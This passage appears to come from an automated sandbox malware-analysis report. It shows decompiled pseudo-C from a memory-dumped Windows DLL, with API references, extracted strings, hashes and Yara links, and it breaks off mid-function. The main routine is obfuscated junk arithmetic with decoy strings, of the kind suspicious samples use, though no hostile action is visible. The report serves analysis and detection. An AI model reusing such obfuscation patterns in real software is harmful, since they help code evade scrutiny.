				 *((intOrPtr*)(_t282 + 8)) = 0;
				 *((intOrPtr*)(_t282 + 0xc)) = 0;
				E6E1C5DAB(_t282, "6623");
				_push("out drop ");
				 *(_t400 - 4) = 2;
				_t174 = E6E1C4197(_t260, "6623", _t362, _t383);
				 *(_t400 - 4) =  *(_t400 - 4) | 0xffffffff;
				E6E1C1E10(_t174);
				_t176 =  *0x6e2859dc; // 0x5
				 *(_t400 - 0x18) =  *0x6e2859d8 * 0x36 +  *0x6e285a90;
				_t286 =  *0x6e285a90 * 0x10e1d;
				_t178 =  *0x6e2859d8; // 0x677030d4
				_t287 = 0x6e285a28;
				 *0x6e2859d8 = _t178 * _t286;
				_t340 =  *0x6e285a90; // 0xbec8bf83
				_t180 =  *0x6e2859d0; // 0x7b3393e
				 *0x6e2859dc = _t176 * _t286 + (_t178 * _t286 >> 0x20);
				_t386 =  *(_t400 - 0x18);
				_t342 = _t340 + _t386 + _t180 + 0x3b;
				do {
					if( *0x6e285a28 != 0x27) {
						L38:
						_t183 =  *_t287 * _t342;
						 *0x6e2859dc = 0;
						_t342 = _t183;
						_t184 = _t183 + 0x2c;
						 *0x6e2859d8 = _t184;
						_t427 = _t184 -  *0x6e285a50; // 0x4e
						if(_t427 != 0) {
							goto L40;
						} else {
							_t428 = 0 -  *0x6e285a54; // 0x0
							if(_t428 != 0) {
								goto L40;
							}
						}
					} else {
						_t426 =  *0x6e285a2c; // 0x0
						if(_t426 == 0) {
							goto L40;
						} else {
							goto L38;
						}
					}
					break;
					L40:
					_t287 =  &(_t287[2]);
				} while (_t287 < "or@std@@");
				_t185 = E6E1C0D32();
				_t364 =  *0x6e285a90; // 0xbec8bf83
				_t49 = _t386 + 0x11dde; // 0x11dde
				 *(_t400 - 0x1c) = _t185;
				 *(_t400 - 0x28) = _t49 + _t364;
				_t291 = _t185 * 0x10e1d;
				_t186 =  *0x6e2859dc; // 0x5
				_t188 =  *0x6e2859d8; // 0x677030d4
				_t190 =  *0x6e2859f2 & 0x0000ffff;
				 *(_t400 - 0x10) = _t188 * _t291;
				_t346 =  *0x6e2859e6; // 0x3945
				 *(_t400 - 0x14) = _t186 * _t291 + (_t188 * _t291 >> 0x20);
				 *(_t400 - 0x34) = _t190;
				if((_t346 & 0x0000ffff) + _t190 != 0x32) {
					_t389 =  *(_t400 - 0x18) * 0x29266b;
					_t191 = _t389 * 0x37;
					__eflags = _t191;
					 *(_t400 - 0x1c) = _t191;
					_t294 = _t191;
					 *(_t400 - 0x20) = _t191;
				} else {
					_t294 =  *(_t400 - 0x1c);
					 *(_t400 - 0x20) = _t294;
					_t389 = _t294 -  *(_t400 - 0x18) *  *(_t400 - 0x18) * 0x10e1d + 0x27;
				}
				 *(_t400 - 0x30) = _t346 & 0x0000ffff;
				_t193 = 0x6e2859e6;
				 *(_t400 - 0x18) = _t389;
				_t390 =  *(_t400 - 0x10);
				 *(_t400 - 0x24) = 0x6e2859e6;
				do {
					if(_t294 ==  *(_t400 - 0x30)) {
						_t346 =  *(_t400 - 0x14);
						goto L48;
					} else {
						asm("cdq");
						_t195 = E6E1E01E0( *_t193 & 0x0000ffff, _t346, _t390,  *(_t400 - 0x14));
						_t294 =  *(_t400 - 0x20);
						_t390 = _t195;
						 *(_t400 - 0x14) = _t346;
						_t364 = _t294 + 5 + _t390;
						 *0x6e285a90 = _t364;
						if(_t364 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t193 =  *(_t400 - 0x24);
							goto L48;
						}
					}
					break;
					L48:
					_t193 =  &(_t193[1]);
					 *(_t400 - 0x24) = _t193;
				} while (_t193 < 0x6e285a44);
				_t197 = 6;
				 *(_t400 - 0x10) = _t390;
				_t391 =  *(_t400 - 0x18);
				_t434 =  *0x6e285a98 - _t197; // 0x6e22e664
				if(_t434 != 0) {
					L53:
					_push(0);
					_t296 =  *(_t400 - 0x10) - 0x27 +  *(_t400 - 0x28) * 0x3d;
					__eflags = _t296;
					asm("sbb edx, eax");
					_t201 =  *(_t400 - 0x28);
				} else {
					_t435 =  *0x6e285a9c; // 0x0
					if(_t435 != 0) {
						goto L53;
					} else {
						_t296 =  *(_t400 - 0x10);
						_t83 = _t296 + 0x11e05; // 0x11e05
						_t201 = _t83;
					}
				}
				 *(_t400 - 0x30) = _t364;
				if( *(_t400 - 0x34) > _t364) {
					_t202 =  *(_t400 - 0x30);
				} else {
					 *0x6e2859e0 = _t201;
					_t364 = _t364 + 2 + _t201 * 0x6d;
					 *0x6e285a90 = _t364;
					_t202 = _t364;
				}
				 *(_t400 - 0x14) = 0x6e285a0e;
				_t393 =  *(_t400 - 0x1c);
				_t297 = _t296 + _t202 + _t296 + _t391 + 0x3d;
				_push(0);
				asm("adc edx, eax");
				 *0x6e2859d8 = _t297;
				 *0x6e2859dc = _t346;
				do {
					if(_t393 != ( *0x6e2859e2 & 0x0000ffff)) {
						_t94 = _t393 + 5; // 0xa2200ffe
						_t364 = _t94 + _t297;
						_push(0);
						 *0x6e285a90 = _t364;
						 *( *(_t400 - 0x14)) =  *( *(_t400 - 0x14)) + _t393;
						_t95 = _t393 + 0x3b; // 0xa2201034
						_t297 = _t297 + _t95 + _t364;
						asm("adc edx, eax");
						 *0x6e2859d8 = _t297;
						 *0x6e2859dc = _t346;
					}
					_t208 =  *(_t400 - 0x14) - 4;
					 *(_t400 - 0x14) = _t208;
				} while (_t208 > 0x6e2859e2);
				_t394 =  *(_t400 - 0x18);
				_t209 = 0x6e2859e6;
				 *(_t400 - 0x10) = _t297;
				_t298 =  *0x6e2859e6 & 0x0000ffff;
				 *(_t400 - 0x14) = _t346;
				do {
					_t347 = _t364;
					if(_t347 == _t298) {
						goto L65;
					} else {
						_t364 = ( *_t209 & 0x0000ffff) * _t347;
						_t347 = _t364;
						 *0x6e285a90 = _t364;
						if(5 + _t347 * 2 != ( *0x6e2859f0 & 0x0000ffff)) {
							_t209 =  *(_t400 - 0x2c);
							_t298 =  *0x6e2859e6 & 0x0000ffff;
							goto L65;
						}
					}
					break;
					L65:
					_t209 = _t209 + 2;
					 *(_t400 - 0x2c) = _t209;
				} while (_t209 < 0x6e285a44);
				_t105 = _t394 + 2; // 0x2
				 *0x6e2859d0 = _t105 + _t347;
				_t213 = E6E1C1029(_t394);
				_t300 =  *0x6e285a90; // 0xbec8bf83
				_t106 = _t394 + 2; // 0x2
				_t369 = _t106 + _t300;
				 *0x6e285a00 = _t213;
				_t348 = _t300;
				if(_t300 >= _t369) {
					_t300 = _t369 * 0xffffffc3;
					 *0x6e2859f2 =  *0x6e2859f2 - _t300;
					_t348 = _t300;
				}
				_t107 = _t213 + 2; // 0x2
				_t371 = _t107 + _t348;
				 *0x6e2859d0 = _t371;
				_t446 =  *0x6e285a04 - 0x1b47; // 0x0
				if(_t446 != 0) {
					_t349 =  *(_t400 - 0x10);
				} else {
					_t300 = ( *0x6e2859e6 & 0x0000ffff) + _t348;
					_push(0);
					_t349 =  *(_t400 - 0x10) + 0x3b + _t300 * 2;
					asm("adc edi, eax");
					 *0x6e2859d8 = _t349;
					 *0x6e2859dc =  *(_t400 - 0x14);
					_t371 =  *0x6e2859d0; // 0x7b3393e
				}
				_t395 = 0x6e285a0e;
				do {
					if(_t300 != ( *0x6e2859e2 & 0x0000ffff)) {
						 *_t395 =  *_t395 + _t300;
						_t229 = _t300 + _t300;
						_t114 = _t229 + 5; // 0x5
						_t371 = _t114;
						_t115 = _t229 + 0x3b; // 0x3b
						_t300 = _t115 + _t371;
					}
					_t395 = _t395 - 4;
					_t216 = _t300;
				} while (_t395 > 0x6e2859e2);
				_t396 =  *(_t400 - 0x18);
				_t301 = 6;
				 *0x6e2859d0 = _t371;
				_t450 =  *0x6e285a02 - _t301; // 0xa221
				if(_t450 != 0) {
					_t375 = _t371 + _t216 * 0xffffffc2;
					_t451 = _t375;
					 *0x6e2859d0 = _t375;
				}
				_t117 = _t396 + 7; // 0x7
				 *0x6e285a90 = _t117 + _t349 * 2;
				E6E1BFB4A(_t396, _t451);
				_t350 =  *0x6e285a00; // 0xa2212dd7
				_t303 = 0x6e285ac8;
				_t372 =  *0x6e2859d8; // 0x677030d4
				do {
					_t452 = _t396 -  *0x6e285a18; // 0x4c
					if(_t452 != 0) {
						L80:
						_t120 = _t396 + 5; // 0x5
						 *0x6e2859dc = 0;
						_t372 = _t120 + _t350;
						 *_t303 =  *_t303 + _t396;
						 *0x6e2859d8 = _t372;
						asm("adc [ecx+0x4], eax");
						_t122 = _t396 + 0x3b; // 0x3b
						_t350 = _t122 + _t350 + _t372;
						 *0x6e285a00 = _t350;
					} else {
						_t453 = 0 -  *0x6e285a1c; // 0x0
						if(_t453 != 0) {
							goto L80;
						}
					}
					_t303 = _t303 - 0x10;
				} while (_t303 > 0x6e285a18);
				_t222 =  *0x6e2859dc; // 0x5
				_t456 = 0 - _t222;
				if(_t456 >= 0 && (_t456 > 0 || _t350 >= _t372)) {
					_push(0);
					_t354 = _t350 - _t372 * 0x3d - _t396;
					 *0x6e285a58 =  *0x6e285a58 - _t396;
					asm("sbb [0x6e285a5c], eax");
					 *0x6e285a00 = _t354;
					asm("sbb ecx, [0x6e2859dc]");
					_t372 = _t354 - _t372 + _t396;
					 *0x6e2859d8 = _t372;
					asm("adc ecx, eax");
					 *0x6e2859dc = 0;
				}
				_t305 =  *0x6e285a90; // 0xbec8bf83
				_t306 =  *0x6e2859d0; // 0x7b3393e
				 *0x6e2859d0 = _t306 + 0x3d + _t372 + _t305 * 2;
				return E6E1E0075(1);
			}

0x6e1c1285
0x6e1c128c
0x6e1c1291
0x6e1c1297
0x6e1c12a2
0x6e1c12aa
0x6e1c12b2
0x6e1c12b8
0x6e1c12ba
0x6e1c12c0
0x6e1c12c3
0x6e1c12c5
0x6e1c12c8
0x6e1c12cb
0x6e1c12d6
0x6e1c12da
0x6e1c12e0
0x6e1c12ec
0x6e1c12f2
0x6e1c12f9
0x6e1c12ff
0x6e1c1302
0x6e1c1308
0x6e1c130e
0x6e1c1310
0x6e1c1310
0x6e1c131d
0x6e1c1320
0x6e1c1325
0x6e1c1328
0x6e1c132b
0x6e1c132e
0x00000000
0x6e1c1330
0x6e1c1334
0x6e1c1338
0x6e1c133d
0x6e1c133f
0x6e1c134b
0x6e1c134d
0x6e1c1353
0x6e1c1359
0x6e1c1361
0x6e1c1363
0x00000000
0x6e1c1363
0x6e1c1361
0x00000000
0x6e1c1366
0x6e1c1366
0x6e1c1369
0x6e1c136c
0x6e1c1375
0x6e1c1378
0x6e1c137e
0x6e1c1390
0x6e1c1397
0x6e1c1397
0x6e1c1399
0x6e1c139f
0x6e1c13a2
0x6e1c13a4
0x6e1c1380
0x6e1c1380
0x6e1c1386
0x00000000
0x6e1c1388
0x6e1c1388
0x6e1c1388
0x6e1c1386
0x6e1c13bf
0x6e1c13c5
0x6e1c13cb
0x6e1c13d1
0x6e1c13d9
0x6e1c13e1
0x6e1c13e6
0x6e1c13eb
0x6e1c13f2
0x6e1c13f8
0x6e1c13fb
0x6e1c1401
0x6e1c1403
0x00000000
0x6e1c1405
0x6e1c140b
0x6e1c1414
0x6e1c1419
0x6e1c141b
0x6e1c1421
0x6e1c1424
0x6e1c1426
0x6e1c1432
0x6e1c143a
0x6e1c143c
0x6e1c1442
0x00000000
0x6e1c1442
0x6e1c143a
0x00000000
0x6e1c1449
0x6e1c1449
0x6e1c144c
0x6e1c1463
0x6e1c1468
0x6e1c1473
0x6e1c147a
0x6e1c1483
0x6e1c1489
0x6e1c148b
0x6e1c1491
0x6e1c149a
0x6e1c14a3
0x6e1c14a9
0x6e1c14a9
0x6e1c14b7
0x6e1c14bc
0x6e1c14bf
0x6e1c14c4
0x6e1c14c6
0x6e1c14cb
0x6e1c14d0
0x6e1c14d2
0x6e1c14d5
0x6e1c14d8
0x6e1c14df
0x6e1c14e4
0x6e1c14e7
0x6e1c14ec
0x6e1c14f2
0x6e1c14f9
0x6e1c14fa
0x6e1c1501
0x6e1c151c
0x6e1c1526
0x6e1c1526
0x6e1c152c
0x6e1c1503
0x6e1c150a
0x6e1c1514
0x6e1c1514
0x6e1c1531
0x6e1c1536
0x6e1c153b
0x6e1c1544
0x6e1c1545
0x6e1c1545
0x6e1c154b
0x6e1c1551
0x6e1c1558
0x6e1c1578
0x6e1c157e
0x6e1c1586
0x6e1c158b
0x6e1c158b
0x6e1c158d
0x6e1c155a
0x6e1c155a
0x6e1c1565
0x6e1c1570
0x6e1c1570
0x6e1c1593
0x6e1c1594
0x6e1c1595
0x6e1c15bc
0x6e1c15c1
0x6e1c15c7
0x6e1c15cc
0x6e1c15d2
0x6e1c15d8
0x6e1c15e1
0x6e1c15e3
0x6e1c15e6
0x6e1c15e9
0x6e1c15eb
0x6e1c15f5
0x6e1c15f7
0x6e1c15fa
0x6e1c15fa
0x6e1c15fc
0x6e1c15ff
0x6e1c1607
0x6e1c160c
0x6e1c1612
0x6e1c1618
0x6e1c1620
0x6e1c1623
0x6e1c1629
0x6e1c1644
0x6e1c164e
0x6e1c1654
0x6e1c162b
0x6e1c162b
0x6e1c1631
0x00000000
0x6e1c1633
0x6e1c1633
0x6e1c163d
0x6e1c163d
0x6e1c1631
0x6e1c1664
0x6e1c1667
0x6e1c166a
0x6e1c166f
0x6e1c1671
0x6e1c1674
0x6e1c167b
0x6e1c167e
0x6e1c1683
0x6e1c168a
0x6e1c168f
0x6e1c1695
0x6e1c169c
0x6e1c169d
0x6e1c16a2
0x6e1c16a5
0x6e1c16aa
0x6e1c16ac
0x6e1c16b6
0x6e1c16bb
0x6e1c16bd
0x6e1c16c0
0x6e1c16c3
0x6e1c16c8
0x6e1c16cd
0x6e1c16d4
0x6e1c16d9
0x6e1c16df
0x6e1c16eb
0x6e1c16f6
0x6e1c16f9
0x6e1c1707
0x6e1c170e
0x6e1c1715
0x6e1c171a
0x6e1c1720
0x6e1c1725
0x6e1c172e
0x6e1c1733
0x6e1c1737
0x6e1c173e
0x6e1c1748
0x6e1c174a
0x6e1c174d
0x6e1c1753
0x6e1c1755
0x6e1c1758
0x6e1c175d
0x6e1c1763
0x00000000
0x6e1c1765
0x6e1c1765
0x6e1c176b
0x00000000
0x00000000
0x6e1c176b
0x6e1c1740
0x6e1c1740
0x6e1c1746
0x00000000
0x00000000
0x00000000
0x00000000
0x6e1c1746
0x00000000
0x6e1c176d
0x6e1c176d
0x6e1c1770
0x6e1c177a
0x6e1c177f
0x6e1c1785
0x6e1c178d
0x6e1c1790
0x6e1c1793
0x6e1c1799
0x6e1c17a2
0x6e1c17ad
0x6e1c17b4
0x6e1c17b7
0x6e1c17c3
0x6e1c17c6
0x6e1c17cc
0x6e1c17e9
0x6e1c17f0
0x6e1c17f0
0x6e1c17f3
0x6e1c17f6
0x6e1c17f8
0x6e1c17ce
0x6e1c17d1
0x6e1c17d9
0x6e1c17e4
0x6e1c17e4
0x6e1c17fe
0x6e1c1801
0x6e1c1806
0x6e1c1809
0x6e1c180c
0x6e1c180f
0x6e1c1812
0x6e1c1878
0x00000000
0x6e1c1814
0x6e1c181b
0x6e1c181f
0x6e1c1824
0x6e1c1827
0x6e1c1830
0x6e1c1836
0x6e1c1838
0x6e1c1840
0x6e1c1842
0x00000000
0x6e1c1842
0x6e1c1840
0x00000000
0x6e1c1845
0x6e1c1845
0x6e1c1848
0x6e1c184b
0x6e1c1854
0x6e1c1855
0x6e1c1858
0x6e1c185b
0x6e1c1861
0x6e1c187d
0x6e1c1884
0x6e1c1889
0x6e1c1889
0x6e1c188c
0x6e1c188e
0x6e1c1863
0x6e1c1865
0x6e1c186b
0x00000000
0x6e1c186d
0x6e1c186d
0x6e1c1870
0x6e1c1870
0x6e1c1870
0x6e1c186b
0x6e1c1891
0x6e1c1897
0x6e1c18b1
0x6e1c1899
0x6e1c1899
0x6e1c18a5
0x6e1c18a7
0x6e1c18ad
0x6e1c18ad
0x6e1c18b6
0x6e1c18c2
0x6e1c18c5
0x6e1c18c7
0x6e1c18ca
0x6e1c18cc
0x6e1c18d2
0x6e1c18d8
0x6e1c18e1
0x6e1c18e6
0x6e1c18e9
0x6e1c18eb
0x6e1c18ed
0x6e1c18f3
0x6e1c18f6
0x6e1c18fb
0x6e1c18fe
0x6e1c1900
0x6e1c1906
0x6e1c1906
0x6e1c190f
0x6e1c1912
0x6e1c1915
0x6e1c191c
0x6e1c191f
0x6e1c1924
0x6e1c1927
0x6e1c192e
0x6e1c1931
0x6e1c1931
0x6e1c1935
0x00000000
0x6e1c1937
0x6e1c1941
0x6e1c1944
0x6e1c1946
0x6e1c1955
0x6e1c1957
0x6e1c195a
0x00000000
0x6e1c195a
0x6e1c1955
0x00000000
0x6e1c1961
0x6e1c1961
0x6e1c1964
0x6e1c1967
0x6e1c196e
0x6e1c1975
0x6e1c197a
0x6e1c197f
0x6e1c1985
0x6e1c1988
0x6e1c198a
0x6e1c198f
0x6e1c1993
0x6e1c1995
0x6e1c1998
0x6e1c199f
0x6e1c199f
0x6e1c19a1
0x6e1c19a9
0x6e1c19ab
0x6e1c19b1
0x6e1c19b8
0x6e1c19eb
0x6e1c19ba
0x6e1c19c4
0x6e1c19c9
0x6e1c19d2
0x6e1c19d5
0x6e1c19d7
0x6e1c19dd
0x6e1c19e3
0x6e1c19e3
0x6e1c19ee
0x6e1c19f3
0x6e1c19fc
0x6e1c19fe
0x6e1c1a01
0x6e1c1a04
0x6e1c1a04
0x6e1c1a07
0x6e1c1a0a
0x6e1c1a0a
0x6e1c1a0c
0x6e1c1a0f
0x6e1c1a11
0x6e1c1a19
0x6e1c1a1e
0x6e1c1a1f
0x6e1c1a25
0x6e1c1a2c
0x6e1c1a31
0x6e1c1a31
0x6e1c1a33
0x6e1c1a33
0x6e1c1a39
0x6e1c1a41
0x6e1c1a46
0x6e1c1a4b
0x6e1c1a51
0x6e1c1a56
0x6e1c1a5c
0x6e1c1a5e
0x6e1c1a64
0x6e1c1a6e
0x6e1c1a6e
0x6e1c1a71
0x6e1c1a76
0x6e1c1a78
0x6e1c1a7a
0x6e1c1a80
0x6e1c1a86
0x6e1c1a89
0x6e1c1a8b
0x6e1c1a66
0x6e1c1a66
0x6e1c1a6c
0x00000000
0x00000000
0x6e1c1a6c
0x6e1c1a91
0x6e1c1a94
0x6e1c1a9c
0x6e1c1aa3
0x6e1c1aa5
0x6e1c1ab0
0x6e1c1ab4
0x6e1c1ab6
0x6e1c1abd
0x6e1c1ac5
0x6e1c1acf
0x6e1c1ad5
0x6e1c1ad7
0x6e1c1add
0x6e1c1adf
0x6e1c1adf
0x6e1c1ae5
0x6e1c1af0
0x6e1c1afc
0x6e1c1b07

APIs

__EH_prolog3.LIBCMT ref: 6E1C128C
GetSystemDirectoryA.KERNEL32 ref: 6E1C13C5
GetTempPathA.KERNEL32(0000056D,C:\Users\user\AppData\Local\Temp\,?,6E1DFF71,?,00000001,?,?,00000001,?,6E2827E0,0000000C,6E1E006E,?,00000001,?), ref: 6E1C1468

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 6E1C1459
Had s, xrefs: 6E1C14DF
C:\Windows\system32, xrefs: 6E1C13B2
DZ(n, xrefs: 6E1C184B
Y(n, xrefs: 6E1C1A11
cd Island, xrefs: 6E1C1531
out drop , xrefs: 6E1C16C8
part , xrefs: 6E1C15B5
6265, xrefs: 6E1C14CB
(Z(n, xrefs: 6E1C170E
Molecul, xrefs: 6E1C167E
E9, xrefs: 6E1C1320, 6E1C1337, 6E1C13E1, 6E1C17B7, 6E1C1801, 6E1C181E, 6E1C191F
6623, xrefs: 6E1C16B1
DZ(n, xrefs: 6E1C136C
DZ(n, xrefs: 6E1C144C
DZ(n, xrefs: 6E1C1967
cd Matter m, xrefs: 6E1C1607
Y(n, xrefs: 6E1C15FF
Y(n, xrefs: 6E1C1915

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DirectoryH_prolog3PathSystemTemp
String ID: (Z(n$6265$6623$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$DZ(n$DZ(n$DZ(n$DZ(n$E9$Had s$Molecul$cd Island$cd Matter m$out drop $part $Y(n$Y(n$Y(n
API String ID: 3607090873-4203534365
Opcode ID: 2c5b1caef2b7afed2534782848eb22a6839aaae409f51b670dd4a9b7359cdd5c
Instruction ID: 64c9d374caad00a3b3af68ee2a3bfd8116c9bb3edc48348fcc9d77a99d08f916
Opcode Fuzzy Hash: 2c5b1caef2b7afed2534782848eb22a6839aaae409f51b670dd4a9b7359cdd5c
Instruction Fuzzy Hash: 8D32B171A81A118FCF04CFA8C4995AE77F3BB5B724B65452AD007DB740E734A889CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C4A80, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E1C4A80(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t23;
				intOrPtr* _t24;
				void* _t29;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t61;

				_t44 = __ebx;
				E6E1E00AC(0x6e228144, __ebx, __edi, __esi, 0x14);
				E6E1C6653(_t61 - 0x14, 0);
				 *(_t61 - 4) =  *(_t61 - 4) & 0x00000000;
				_t57 =  *0x6e29ce80; // 0xe55f70
				 *((intOrPtr*)(_t61 - 0x10)) = _t57;
				_t23 = E6E1A161C(0x6e286b34);
				_t47 =  *((intOrPtr*)(_t61 + 8));
				_t24 = E6E1A171B( *((intOrPtr*)(_t61 + 8)), _t23);
				_t59 = _t24;
				if(_t24 != 0) {
					L5:
					E6E1C66BA(_t61 - 0x14);
					return E6E1E0075(_t59);
				} else {
					if(_t57 == 0) {
						_push( *((intOrPtr*)(_t61 + 8)));
						_push(_t61 - 0x10); // executed
						_t29 = E6E1A18A0(__ebx, _t47, __edx, _t57, _t59); // executed
						__eflags = _t29 - 0xffffffff;
						if(__eflags == 0) {
							E6E1A1438(_t61 - 0x20);
							E6E1E3D74(_t61 - 0x20, 0x6e283504);
							asm("int3");
							E6E1E00AC(0x6e228192, __ebx, _t57, _t59, 0xc);
							_t60 = E6E1C4A32(_t44, _t57, _t59, 8);
							 *((intOrPtr*)(_t61 - 0x18)) = _t61 - 0xd;
							 *((intOrPtr*)(_t61 - 0x14)) = _t60;
							__eflags = 0;
							 *(_t61 - 4) = 0;
							 *_t60 = 0;
							 *((intOrPtr*)(_t60 + 4)) = 0;
							 *_t60 = E6E1C5BFB();
							return E6E1E0075(_t60);
						} else {
							_t59 =  *((intOrPtr*)(_t61 - 0x10));
							 *((intOrPtr*)(_t61 - 0x10)) = _t59;
							 *(_t61 - 4) = 1;
							E6E1C6FD3(__eflags, _t59);
							 *((intOrPtr*)( *_t59 + 4))();
							 *0x6e29ce80 = _t59;
							goto L5;
						}
					} else {
						_t59 = _t57;
						goto L5;
					}
				}
			}

0x6e1c4a80
0x6e1c4a87
0x6e1c4a91
0x6e1c4a96
0x6e1c4a9f
0x6e1c4aa5
0x6e1c4aa8
0x6e1c4aad
0x6e1c4ab1
0x6e1c4ab6
0x6e1c4aba
0x6e1c4af5
0x6e1c4af8
0x6e1c4b04
0x6e1c4abc
0x6e1c4abe
0x6e1c4ac4
0x6e1c4aca
0x6e1c4acb
0x6e1c4ad2
0x6e1c4ad5
0x6e1c4b08
0x6e1c4b16
0x6e1c4b1b
0x6e1c4b23
0x6e1c4b2f
0x6e1c4b35
0x6e1c4b38
0x6e1c4b3b
0x6e1c4b3d
0x6e1c4b40
0x6e1c4b42
0x6e1c4b4a
0x6e1c4b53
0x6e1c4ad7
0x6e1c4ad7
0x6e1c4ada
0x6e1c4ade
0x6e1c4ae2
0x6e1c4aec
0x6e1c4aef
0x00000000
0x6e1c4aef
0x6e1c4ac0
0x6e1c4ac0
0x00000000
0x6e1c4ac0
0x6e1c4abe

APIs

__EH_prolog3.LIBCMT ref: 6E1C4A87
std::_Lockit::_Lockit.LIBCPMT ref: 6E1C4A91
int.LIBCPMT ref: 6E1C4AA8

Part of subcall function 6E1A161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1A162D
Part of subcall function 6E1A161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1A1647

std::_Facet_Register.LIBCPMT ref: 6E1C4AE2
std::_Lockit::~_Lockit.LIBCPMT ref: 6E1C4AF8
__CxxThrowException@8.LIBVCRUNTIME ref: 6E1C4B16

Strings

p_, xrefs: 6E1C4A9F, 6E1C4AEF
4k(n, xrefs: 6E1C4A9A

Memory Dump Source

Source File: 00000000.00000002.574510952.000000006E1A1000.00000020.00020000.sdmp, Offset: 6E1A0000, based on PE: true

Associated: 00000000.00000002.573473628.000000006E1A0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.585832407.000000006E22A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.601405794.000000006E285000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602444453.000000006E29C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.602946915.000000006E29D000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: 4k(n$p_
API String ID: 651022567-789334486
Opcode ID: b94367a7a0ed1b6a27aa7eba5cd2aebd67f1f5b38f2d76c6a87209c11e8c0995
Instruction ID: 52377b831dd09ab936afd4acb59c211208609b4003ec56069c12ba55a5771372
Opcode Fuzzy Hash: b94367a7a0ed1b6a27aa7eba5cd2aebd67f1f5b38f2d76c6a87209c11e8c0995
Instruction Fuzzy Hash: F91125B59005298BCF01DBE4C844AFDB779BF24B14F140908E111EB2D0DF78C985E792

Uniqueness

Uniqueness Score: -1.00%

Function 6E20E506, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E6E20E506(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int _v56;
				char _v276;
				short _v278;
				short _v280;
				char _v448;
				signed int _v452;
				signed int _v456;
				short _v458;
				intOrPtr _v460;
				intOrPtr _v464;
				signed int _v468;
				signed int _v472;
				intOrPtr _v508;
				char _v536;
				signed int _v540;
				intOrPtr _v544;
				signed int _v556;
				char _v708;
				signed int _v712;
				signed int _v716;
				short _v718;
				signed int* _v720;
				signed int _v724;
				signed int _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed int _v744;
				signed int _v748;
				signed int _v752;
				char _v820;
				char _v1248;
				char _v1256;
				intOrPtr _v1276;
				signed int _v1292;
				signed int _t241;
				signed int _t243;
				void* _t246;
				signed int _t249;
				signed int _t251;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t263;
				signed int _t265;
				void* _t267;
				signed int _t268;
				signed int _t269;
				signed int _t270;
				signed int _t272;
				signed int _t275;
				signed int _t282;
				signed int _t283;
				signed int _t284;
				intOrPtr _t285;
				signed int _t288;
				signed int _t292;
				signed int _t293;
				intOrPtr* _t295;
				intOrPtr _t296;
				signed int _t299;
				signed int _t300;
				signed int _t302;
				signed int _t322;
				signed int _t323;
				signed int _t326;
				signed int _t331;
				void* _t333;
				signed int _t335;
				void* _t336;
				intOrPtr _t337;
				signed int _t342;
				signed int _t343;
				intOrPtr* _t346;
				signed int _t360;
				signed int _t362;
				signed int _t364;
				intOrPtr* _t365;
				signed int _t367;
				signed int _t373;
				intOrPtr* _t377;
				intOrPtr* _t380;
				void* _t383;
				signed int _t384;
				intOrPtr* _t385;
				signed int _t398;
				signed int _t401;
				intOrPtr* _t402;
				signed int _t404;
				signed int* _t408;
				intOrPtr* _t415;
				intOrPtr* _t416;
				intOrPtr _t425;
				signed int _t426;
				short _t427;
				signed int _t430;
				intOrPtr _t431;
				signed int _t434;
				intOrPtr _t435;
				signed int _t437;
				signed int _t440;
				intOrPtr _t446;
				signed int _t447;
				void* _t448;
				signed int _t449;
				signed int _t450;
				signed int _t453;
				signed int _t455;
				void* _t456;
				signed int _t459;
				signed int* _t460;
				intOrPtr* _t461;
				short _t462;
				void* _t464;
				signed int _t466;
				signed int _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				signed int _t474;
				void* _t475;
				void* _t477;
				signed int _t478;
				void* _t480;
				void* _t482;
				intOrPtr _t494;

				_t425 = __edx;
				_t464 = _t470;
				_t471 = _t470 - 0xc;
				_push(__ebx);
				_push(__esi);
				_v12 = 1;
				_t241 = E6E20F26D(__ecx, 0x6a6); // executed
				_t360 = _t241;
				_t242 = 0;
				_pop(_t373);
				if(_t360 == 0) {
					L20:
					return _t242;
				} else {
					_push(__edi);
					_t2 = _t360 + 4; // 0x4
					_t430 = _t2;
					 *_t430 = 0;
					 *_t360 = 1;
					_t446 = _a4;
					_t4 = _t446 + 0x30; // 0x6e20da4e
					_t243 = _t4;
					_push( *_t243);
					_v16 = _t243;
					_push(0x6e230f34);
					_push( *0x6e230dec);
					E6E20E445(_t360, _t373, _t430, _t446, _t430, 0x351, 3);
					_t473 = _t471 + 0x18;
					_v8 = 0x6e230dec;
					while(1) {
						L2:
						_t246 = E6E21D470(_t430, 0x351, 0x6e230f30);
